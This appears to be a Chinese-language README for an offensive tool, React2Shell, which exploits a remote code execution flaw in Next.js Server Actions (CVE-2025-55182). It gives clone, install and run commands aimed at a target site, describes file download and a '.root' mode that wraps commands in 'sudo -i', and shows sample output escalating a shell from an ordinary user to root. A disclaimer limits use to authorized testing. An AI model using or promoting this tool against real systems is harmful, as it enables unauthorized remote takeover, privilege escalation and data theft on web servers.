针对 Next.js Server Actions 的高级利用工具包 (CVE-2025-55182)。
React2Shell 是一个强大的交互式 shell 封装工具,专门用于利用 React2Shell 漏洞。它超越了简单的 RCE,提供命令历史、文件传输功能以及自动化的权限提升策略。
base64 | sudo -i),用于绕过 shell 限制并即时提权至 root。.download <远程路径> [本地路径]:使用 base64 编码实现可靠的二进制安全文件下载。.save:将命令输出保存到本地证据文件。
git clone https://github.com/xalgord/React2Shell.git
cd React2Shell
pip install requests
python3 react2shell.py -u https://目标-nextjs-站点.com/
运行并验证 root 持久化策略检测:
python3 react2shell.py -u https://目标.com/
进入 shell 后:
ubuntu@target:~$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)...
ubuntu@target:~$ .root
[*] Root 模式已启用
root@target:~$ id
uid=0(root) gid=0(root) groups=0(root)
仅供教育用途。 本工具仅用于安全研究和授权测试。作者不对因使用本工具造成的任何滥用或损害负责。请勿扫描或利用未经明确授权的目标。
专为道德渗透测试和红队行动开发。
| 命令 | 描述 |
|---|
.root | 切换 Root 模式(在命令前包装 sudo -i) |
.download <文件> | 从远程服务器下载文件 |
.save | 将上次命令的输出保存到文件 |
.exit | 退出 shell |